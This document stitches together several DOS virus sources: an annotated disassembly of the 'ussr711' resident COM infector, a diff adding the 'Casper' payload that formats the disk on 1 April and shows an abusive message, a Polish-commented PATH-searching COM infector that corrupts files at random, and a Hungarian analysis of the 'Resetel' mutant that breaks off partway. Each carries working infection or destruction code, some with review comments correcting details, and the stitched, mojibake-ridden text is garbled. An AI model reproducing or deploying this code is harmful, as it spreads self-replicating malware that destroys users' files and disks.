;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 0D9h
data_8e equ 0DBh
data_9e equ 122h
data_10e equ 124h
data_11e equ 13Ah
data_12e equ 13Ch
data_13e equ 441h
data_14e equ 3
data_15e equ 12h
data_16e equ 0
data_17e equ 0B0h
data_18e equ 0B2h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr711 proc far
start:
jmp loc_1
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
call sub_1
ussr711 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
loc_1:
call sub_2
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
je $+7Dh ; Jump if equal
mov ax,es
dec ax
mov es,ax
mov ax,es:data_14e
sub ax,2Ch
mov es:data_14e,ax
sub word ptr es:data_15e,2Ch
nop
mov es,es:data_15e
mov cx,2BBh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ds,ax
mov cx,ds:data_5e
mov es:data_11e,cx
mov cx,ds:data_6e
mov es:data_12e,cx
mov word ptr ds:data_5e,126h
mov ds:data_6e,es
mov cx,ds:data_1e
mov es:data_7e,cx
mov cx,ds:data_2e
mov es:data_8e,cx
mov word ptr ds:data_1e,0B4h
mov ds:data_2e,es
mov cx,ds:data_3e
mov es:data_9e,cx
mov cx,ds:data_4e
mov es:data_10e,cx
mov word ptr ds:data_3e,0DDh
mov ds:data_4e,es
sti ; Enable interrupts
mov di,100h
mov si,bx
add si,2B3h
mov cx,3
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,cs
mov es,ax
mov ds,ax
xor ax,ax ; Zero register
mov si,ax
mov di,0
mov bx,offset start
jmp bx ; Register jump
add bl,[si]
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
db 0B2h, 00h, 74h, 37h, 75h, 07h
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
db 00h
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
db 74h, 3Ch, 80h,0FCh, 03h, 74h
db 05h, 80h,0FCh, 0Bh
db 75h, 32h
loc_3:
test dl,80h
js loc_4 ; Jump if sign=1
push ax
mov ax,cs:data_18e
and ax,3
pop ax
jnz loc_4 ; Jump if not zero
push bp
add [bp+si+7Dh],dh
push ax
mov ax,cs
mov ds,ax
mov ax,[bp+6]
push ax
popf ; Pop flags
stc ; Set carry flag
pushf ; Push flags
pop ax
mov [bp+6],ax
xor ax,ax ; Zero register
mov ds,ax
pop ax
mov ah,80h
mov ds:data_13e,ah
pop ds
pop bp
iret ; Interrupt return
loc_4:
;* jmp far ptr loc_20
sub_1 endp
db 0EAh, 49h, 01h, 08h,0D7h
cmp ax,4B04h
jne loc_5 ; Jump if not equal
mov ax,44Bh
iret ; Interrupt return
loc_5:
cmp ax,4B00h
je loc_7 ; Jump if equal
cmp ax,4B03h
je loc_7 ; Jump if equal
loc_6:
;* jmp far ptr loc_19
db 0EAh,0B5h, 02h, 46h,0D5h
loc_7:
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
mov ax,ds
mov es,ax
cld ; Clear direction
mov al,0
mov di,dx
mov cx,0C8h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
jnz loc_8 ; Jump if not zero
std ; Set direction flag
mov al,2Eh ; '.'
mov cx,0Ah
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
loc_8:
jnz loc_11 ; Jump if not zero
inc di
inc di
mov al,[di]
and al,0DFh
cmp al,43h ; 'C'
jne loc_11 ; Jump if not equal
mov al,[di+1]
and al,0DFh
cmp al,4Fh ; 'O'
jne loc_11 ; Jump if not equal
mov al,[di+2]
and al,0DFh
cmp al,4Dh ; 'M'
jne loc_11 ; Jump if not equal
mov al,[di-2]
and al,0DFh
cmp al,44h ; 'D'
jne loc_9 ; Jump if not equal
mov al,[di-8]
and al,0DFh
cmp al,43h ; 'C'
je loc_11 ; Jump if equal
loc_9:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
mov word ptr cs:[2B4h],cx
mov cx,20h
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_11 ; Jump if carry Set
mov word ptr cs:[2B0h],ds
mov word ptr cs:[2B2h],dx
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_11 ; Jump if carry Set
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
mov word ptr cs:[2ACh],cx
mov word ptr cs:[2AEh],dx
jmp short loc_12
nop
loc_10:
jmp loc_6
loc_11:
jmp loc_16
loc_12:
mov cx,3
mov ax,cs
mov ds,ax
mov es,ax
mov dx,2B6h
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov cx,0
mov dx,word ptr cs:[2B7h]
add dx,3
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,0Ah
mov dx,29Bh
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cld ; Clear direction
mov cx,0Ah
mov si,29Bh
mov di,data_16e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_15 ; Jump if zero
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
cmp ax,6A4h
jb loc_15 ; Jump if below
jmp short loc_14
nop
loc_13:
jmp short loc_10
loc_14:
mov cx,cs:data_18e
and cx,0Fh
add cx,5
mov ax,cs
mov ds,ax
xor dx,dx ; Zero register
mov ax,4000h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
sub ax,3
mov word ptr cs:[2AAh],ax
xor dx,dx ; Zero register
mov ax,4000h
mov cx,2BBh
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ax,cs
mov ds,ax
mov dx,2A9h
mov ax,4000h
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_15:
mov ax,5701h
mov cx,word ptr cs:[2ACh]
mov dx,word ptr cs:[2AEh]
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ax,3E00h
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov ds,word ptr cs:[2B0h]
mov dx,word ptr cs:[2B2h]
mov cx,word ptr cs:[2B4h]
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
loc_16:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp short loc_13
nop
add [bx+si],al
push ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
;* je loc_17 ; Jump if equal
db 74h, 09h
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
;* jmp loc_18
db 0E9h, 15h, 00h
test ax,3AA5h
push ss
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
db 0B8h, 00h, 4Ch, 02h, 00h
seg_a ends
end start
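Review bot: Two register comments are wrong in the same way: the AX=5700h call is annotated `returns cx=time, dx=time` and the AX=5701h call `cx=time, dx=time`; DOS function 57h carries the date in DX, so both should say `dx=date` (for 5701h: `; cx=time, dx=date`). Separately, the block between the opening `jmp loc_1` and `sub_2` (the `int 21h`, the `call sub_1`, and sub_1's body, which repeats the first seven instructions of sub_2 with its `cmp` result never branched on) is unreachable from that jump and reads like Sourcer decoding the saved host bytes and data as code; a comment marking it as such would stop readers from treating sub_1 as a real routine. The visible markers also deserve a header line for analysts: the in-memory probe is AX=4B04h answered with AX=44Bh, on disk the sample compares ten bytes at the original JMP target plus 3 against its own image at offset 0, and the write issued before the body is a pad of `data_18e` masked with 0Fh plus 5 (5–20 bytes), so infected-file growth is not constant.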

@ -0,0 +1,33 @@
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* *
;* DETAILS: Date Activated Hard Disk Destroyer. *
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
;* *
;**************************************************************************
mov ah,2ah ; DOS Get Date.
int 21h
cmp dx,0401h ; 5th May.
jne utilend
mov ax,0515h ;Format Cylinder, 15 Sectors.
mov ch,0 ;Cylinder 0.
mov dx,00 ;Head 0, Drive 80h.
mov es,dx ;Junk for address marks.
mov bx,0 ;Junk....
int 13h ;Do It!
int 20h ;Exit
utilend: jmp entry3
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
db "In Fact It Might Just Be Impossible To Recover! "
db "How's That Grab Ya! <GRIN>"
entry3:
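Review bot: The comments contradict the code and each other: the header gives the trigger as 1st April and `cmp dx,0401h` agrees (function 2Ah returns DH=month, DL=day, so 0401h is month 4, day 1), yet the inline comment says `; 5th May`; it should read `; 1st April (DH=month, DL=day)`. Likewise `mov dx,00` is annotated `Head 0, Drive 80h`, but it loads DL=0, so the int 13h AH=05h call as written addresses drive 0 (the first floppy) rather than the hard disk the header and message text advertise; the comment should describe the code, `; DH=0 head 0, DL=0 drive 0`. With DX=0 the following `mov es,dx` and `mov bx,0` point the address-mark table at 0000:0000, the interrupt vector table, which the `Junk` comment only half conveys. Both mismatches matter to anyone assessing this sample's actual impact rather than its claimed one.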


@ -0,0 +1,324 @@
; Kod ¦r˘dowy wirusa nieznanego autorstwa. Widoczne s† silne wpywy 648.
; Dodano wasne komentarze wskazuj†ce na r˘§nice midzy t† wersj† i oryginaem.
; Komentarze te poprzedzane s† znakami AK:.
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzežnia 1990.
comment ;
**********************************************************
wszystkie adresy w programie sa uzywane jako wzgledne
do rejestru si ,nie mozna urzywac adresow bezwzglednych
jako offset poniewaz po 'doklejeniu sie do programu
moze on byc w roznych miejscach
**********************************************************
;
adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych
;w programie wzgledem niego beda
;obliczane przesuniecia pol zmiennych
start_prg equ 100h ;adres poczatku programu typu .com
ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy
get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA
msdos equ 21h
write equ 40h
wirus_len equ DTA + 43 - start
code segment byte public 'code'
assume cs:code,ds:code,es:code
org 100h
st1: jmp short start
int msdos
start: mov dx,offset stare_DTA
cld ;ustawienie kierunku przesylania
mov si,dx ;poczatek zmiennych programu
add si,ofst_rozk ;adres pola rozkazy
mov di,100h ;adres pod ktorym jest poczatek programu
mov cx,3 ;ilosc bajtow do przeslania
repz movsb ;odtworzenie starego poczatku
mov si,dx ;odtworzenie si
; AK: pominito badanie wersji DOS
push es ;zachowanie es bo bedzie zmieniane
mov ah,get_dta_addr ;pobierz adres DTA
int msdos
mov [si],bx ;zapamietanie adresu DTA w polu
mov [si+2],es ;stare_DTA
pop es ;odtworzenie es
mov dx,5Fh ;adres pola DTA
add dx,si
mov ah,1Ah ;ustaw adres DTA ds:dx
int msdos
; AK: zmieniona jest kolejnožŤ instrukcji, teraz do przechowania SI u§yto
; DX zamiast stosu
push es ;zachowanie es
push si ;zachowaj si
add si,1ah ;adres tekstu PATH=
mov dx,si
mov es,ds:[2Ch] ;adres srodowiska set
; AK: w oryginale jest to PUSH SI, POP SI
mov di,0
szukaj_dalej:
mov si,dx
lodsb
mov cx,8000h ;dlugosc srodowiska
repnz scasb ;szukanie litery P
mov cx,4 ;dlugosc reszty ATH=
porownuj:
lodsb
scasb
jnz szukaj_dalej
loop porownuj
pop si ;odtworz rejestry
pop es
mov [si+16h],di ;adres pierwszego bajtu za PATH=
mov di,si
add di,1Fh ;adres bufora dla nazwy zbioru
mov bx,si
jmp short dalej
nast_sciezka:
cmp word ptr[si+16h],0 ;czy koniec path
jnz l1 ;nie
jmp exit1 ;zakoncz nie ma wiecej zbiorow
l1: push ds
push si
mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany
mov di,si
mov si,es:[di+16h]
add di,1Fh
next: lodsb ;zaladuj kolejny znak sciezki dostepu
cmp al,';' ;czy koniec definicji scierzki
jz koniec_sciezki
cmp al,0 ;czy koniec lancucha path
jz koniec_set
stosb ;przepisz znak do bufora
jmp short next
koniec_set:
mov si,0
koniec_sciezki:
pop bx
pop ds
mov [bx+16h],si ;adres do ktorego przeszukano path
cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \
jz dalej
mov al,'\'
stosb ;dopisz \
dalej: mov [bx+18h],di
mov si,bx
add si,10h
mov cx,6
repz movsb ;przepisanie *.com \0
mov si,bx
mov ah,4Eh ;find first
mov dx,1Fh
add dx,si
mov cx,3 ;ukryty tylko do odczytu
int msdos
jmp short czy_jest
szuk_nast:
mov ah,4Fh ;find next
int msdos
czy_jest:
jnc jest
jmp short nast_sciezka
jest: mov ax,[si+75h] ;pole zawierajace czas w DTA
and al,1Fh ;czy sa 62 sekundy
cmp al,1Fh
jz szuk_nast
cmp word ptr [si+79h],0FA00h
ja szuk_nast ;jesli zbyt dlugi
cmp word ptr [si+79h],10
jc szuk_nast
mov di,[si+18h]
push si
add si,7Dh
kopiuj:
lodsb ;kopiuje nazwe zbioru
stosb ;nazwa w postaci ASCIIZ
cmp al,0 ;czy koniec nazwy
jnz kopiuj
pop si
mov ax,4300h ;pobierz atrybuty zbioru
mov dx,1Fh
add dx,si
int msdos
mov [si+8],cx ;zapamietanie atrybutow
mov ax,4301h ;ustaw atrybuty
and cx,0FFFEh ;usuwa ewentualne r/o
mov dx,1Fh
add dx,si
int msdos
mov ax,3D02h ;otwarcie zbioru
mov dx,1Fh
add dx,si
int msdos
jnc l2 ;czy poprawne otwarcie
jmp exit2
l2: mov bx,ax
mov ax,5700h ;pobierz czas i date powstania zbioru
int msdos
mov [si+4],cx ;czas
mov [si+6],dx ;data
mov ah,2Ch ;pobierz czas systemowy
int msdos
and dh,7 ;sekundy
jnz zostaw
comment ;
**********************************************************
tutaj mozna umiescic dowolna procedure uszkadzajaca zbior
ta wywolywana jest losowo jesli ostatnie trzy bity sekund
zegara systemu sa rowne zero np. 8,16,24 itd.
**********************************************************
;
mov ah,write ;zapis do zbioru
mov cx,5 ;pieciu bajtow lezacych
mov dx,si ;juz poza programem czyli
add dx,8Ah ;faktycznie dowolnych
int msdos
jmp exit3
;*********************************************************
;koniec procedury uszkadzajacej zbior
;*********************************************************
zostaw: mov ah,3Fh ;odczyt trzech pierwszych
mov cx,3 ;bajtow z pliku
mov dx,ofst_rozk ;do pola rozkazy
add dx,si
int msdos
jc exit3 ;jesli byl blad czytania
cmp ax,3 ;czy odczytano dokladnie
jnz exit3 ;trzy bajty
mov ax,4202h ;przewiniecie zbioru na koniec
mov cx,0
mov dx,0
int msdos
jc exit3 ;jesli blad
mov cx,ax ;w ax dlugosc zbioru
sub ax,3
;obiczanie przesuniecia dla skoku do poczatku wirusa
;jest to adres konca zbioru minus 3 poniewaz
;jmp jest trzy bajtowy
mov [si+0Eh],ax ;zapis adresu w polu skok
add cx,adr_baz - start + start_prg
;obliczanie adresu poczatku danych (tego ktory jest w si)
;jest to adres pola stare_DTA + 100h przesuniecia programu
mov di,si
sub di,adr_baz - start - 1
mov [di],cx ;zapisanie adresu bezposrednio w pole
;w pole rozkazu mov dx,offset
mov ah,write ;dopisanie wirusa na koniec
mov cx,wirus_len ;dlugosc wirusa
mov dx,si
sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa
int msdos
jc exit3 ;jesli blad
cmp ax,wirus_len ;czy zapisano calego wirusa
jnz exit3
mov ax,4200h ;przewiniecie zbioru na poczatek
mov cx,0
mov dx,0
int msdos
jc exit3 ;jesli blad
mov ah,write ;zapis jmp do wirusa
mov cx,3 ;na poczatku
mov dx,si
add dx,0Dh ;pole skok
int msdos
exit1: mov dx,[si+6] ;data
mov cx,[si+4] ;czas
or cx,1Fh ;zaznaczenie ze zbior jest zarazony
;ilosc sekund = 62
mov ax,5701h ;zapis daty i czasu do zbioru
int msdos
mov ah,3Eh ;zamkniecie zbioru
int msdos
exit2: mov ax,4301h ;ustawienie atrybutow
mov cx,[si+8] ;stare atrybuty
mov dx,001Fh
add dx,si
int msdos
exit3: push ds
mov ah,1Ah ;ustaw adres DTA
mov dx,[si+0] ;pole stare_DTA
mov ds,es:[si+2]
int msdos
pop ds
xor ax,ax ;zerowanie rejestrow
xor bx,bx
xor dx,dx
xor si,si
mov di,0100h ;na stos adres startu
push di
xor di,di
ret
stare_DTA dd 0
czas_zb dw 0
data_zb dw 0
attr_zb dw 0
rozkazy db 0b4h,4ch,0cdh
skok db 0e9h,0,0 ;kod rozkazu jmp
zbior db '*.com',0
srodow dw 0 ;adres srodowiska set
bufor dw 0 ;wskaznik do nazwy zbioru
path db 'PATH='
nazwa_zb db 63 dup(0) ;pole na nazwe zbioru
DTA db 43 dup(0) ;pole dta
code ends
end st1


@ -0,0 +1,669 @@
A Resetel vˇrus Tltget fle mut nsa
***************************************
A Resetel vˇrussal teljes egszben megegyezik a fertz mechanizmus.
Eltekintve att˘l, hogy ez a mut ns nem tesz tnkre f jlokat. Az adatter<EFBFBD>let is
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetelt. A v ltoz s:
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik Tltgetvel fertztt, akkor
elindˇtja a Tltgett !
;Ide (0100-ra) mutat a file elejr”l az ugr˘ utasˇt s.
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
0100 51 PUSH CX ;CX a stacken marad mindvgig.
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
;fert”zskor  llˇtja be , ˇgy mindig a helyes cˇmre mutat.
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
0104 FC CLD ;( ERE_DTA_OFS)
0105 8BF2 MOV SI,DX
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
010B BF0001 MOV DI,0100 ;Program eleje
010E B90300 MOV CX,0003 ;3 byte
0111 F3 REPZ
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
;-----------------------------------------
; Install ci˘s rsz:
;-----------------------------------------
;DOS verzi˘ lekrdezse. 1.00-n l kisebb verzi˘n l az eredeti
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
0115 B430 MOV AH,30
0117 CD21 INT 21 ;DOS verzi˘ lekrdezse
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbnl lp ki
011B 7503 JNZ 0120
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
;Disk Transzfer Address lekrdezse, elmentse
0120 06 PUSH ES
0121 B42F MOV AH,2F
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rzse
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
;-------------------------------------------------------
; A beiktatott behŁz˘ rsz
;-------------------------------------------------------
012D E85802 CALL 0388
0130 07 POP ES
;DTA be llˇt sa ENTRY cˇmre (0358). Igy a FindFirst, FindNext
;DOS funkci˘k ide fogj k m solni a file adatait (nevt,idejt,
;hossz t,stb).
0131 BA5F00 MOV DX,005F
;{Val˘szˇn<CB87>leg rgi assemblerrel ˇrt k a vˇrust, ezrt van itt
;egy NOP utasˇt s.}
0134 90 NOP
0135 03D6 ADD DX,SI
0137 B41A MOV AH,1A
0139 CD21 INT 21 ;DTA  llˇt sa DS:DX-re: ENTRY(0358)
;A PATH-ok cˇmnek megkeresse. Ha az aktu lis k”nyvt rban m r
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
;k”nyvt raknak a nevt , amelyekben mg megfert”zend” fileokat
;tal lhat.
013B 06 PUSH ES
013C 56 PUSH SI
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
;(a k”vetkez” directoryra) mutatni
;A k”vetkez” rsz a PATH= sz”veget keresi meg az environment
;ter<65>leten:
0144 5E POP SI
0145 56 PUSH SI
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
014A AC LODSB ;AL=DS:[SI],SI++
014B B90080 MOV CX,8000 ;max 32k az environment
014E F2 REPNZ
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
;'P' bet<65>t
0150 B90400 MOV CX,0004 ;Mg 4 bet<65> azonosˇt sa
0153 AC LODSB ;AL=DS:[SI],SI++
0154 AE SCASB ;AL-ES:[DI],DI++
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
;egyezik (nem 'ATH=')
0157 E2FA LOOP 0153
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
015A 07 POP ES
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ks”bb Łgyis
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
016D EB3A JMP 01A9
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
;fogja keresni.
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
0174 7503 JNZ 0179
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
;(mindet megfert”te m r)
0179 1E PUSH DS
017A 56 PUSH SI
017B 26 ES:
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
0180 8BFE MOV DI,SI ;(02F9)
0182 26 ES:
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
018B AC LODSB ;AL=DS:[SI] SI++
018C 3C3B CMP AL,3B ;';'
018E 740A JZ 019A
0190 3C00 CMP AL,00
0192 7403 JZ 0197
0194 AA STOSB ;ES:[DI]:=AL DI++
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
;#0-val z rult a PATH bejegyzs => nem lesz t”bb
0197 BE0000 MOV SI,0000
019A 5B POP BX ;Ezut n BX mutat az adatokra
019B 1F POP DS
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
;( Nincs t”bb PATH jelzs )
;A k”vetkez” PATH-ban adott aldir. m r  tm solva.
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
01A6 B05C MOV AL,5C ;Egybknt '\' ˇr s
01A8 AA STOSB ;ES:[DI]:=AL DI++
;Egy aldirectory kirtkelse . El”sz”r az aktu lis , majd a
;FILE_PATH -ra m solt aldirectory vgignzse, fert”zs.
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
;A COM kiterjeszts<E2809A> fileok megkeresse:
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
;Ide kell majd a file nevt
;m solni (az aldir. neve ut n)
01AD 8BF3 MOV SI,BX ;(02F9)
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
01B3 B90600 MOV CX,0006 ;6 bet<65>  tm sol sa ('*.COM',0)
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
01B7 A4 MOVSB ;m”g , ˇgy teljes keressi utunk
;lesz
01B8 8BF3 MOV SI,BX ;(02F9)
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
01BC BA1F00 MOV DX,001F
01BF 90 NOP
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
01C5 CD21 INT 21 ;Az els” COM kiterjeszts<E2809A> file
;megkeresse . A file adatait a DTA
; ltal mutatott cˇmre (ENTRY 0358)
;m solja.
01C7 EB04 JMP 01CD
;K”vetkez” COM file keresse (adatai ENTRY-re ker<65>lnek).
01C9 B44F MOV AH,4F ;FIND NEXT
01CB CD21 INT 21
01CD 7302 JNB 01D1
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
;aldirt keres a PATH-ban
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
;a filenak az ellen”rzse, fert”zse k”vetkezik.
;Annak ellen”rzse , hogy a file megfert”zhet”-e (fert”z”tt-e,
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
;fileokat keresni.
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
01D5 241F AND AL,1F
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
;64000h (m r nem fr bele a vˇrus)
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
;-----------------------------------------
; Megvan a kiv laszott file.
;-----------------------------------------
;A file nevt az aldirectory neve ut n kell m solni , hogy a
;teljes Łt rendelkezs<E2809A>nkre  lljon , ˇgy majd meg tudja nyitni
;a filet.
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
01EE 56 PUSH SI ;a file nevt m solni
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
01F3 AC LODSB ;AL:=DS:[SI] SI++
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
01F5 3C00 CMP AL,00 ;Nvlez r˘ 0-ig m sol
01F7 75FA JNZ 01F3
01F9 5E POP SI ;SI Łjra az adatokra mutat
;A file egyes eredeti inform ci˘inak meg”rzse , hogy a fert”-
;zs ne t<>nj”n fel.
;Az eredeti attributtum meg”rzse:
;{Fogalmam sincs mirt kell a file attributtum t mg egyszer
;lekrdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
;vˇrus ˇr˘ja nem tudta?}
01FA B80043 MOV AX,4300 ;File attributtum nak lekrdezse
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
0200 90 NOP ;{piszok}
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
0203 CD21 INT 21 ;CX-ben az attributtum
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
;A file ˇr svdelmnek t”rlse:
0209 B80143 MOV AX,4301 ;File attributtum nak  llit sa
020C 81E1FEFF AND CX,FFFE ;Read Only jelzs t”rlse
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
0213 90 NOP ;Łjra? }
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
0216 CD21 INT 21
;File megnyit sa:
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
021B BA1F00 MOV DX,001F ;{Mg egyszer be llˇtja!}
021E 90 NOP ;{piszok}
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
0221 CD21 INT 21
0223 7303 JNB 0228
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”zs
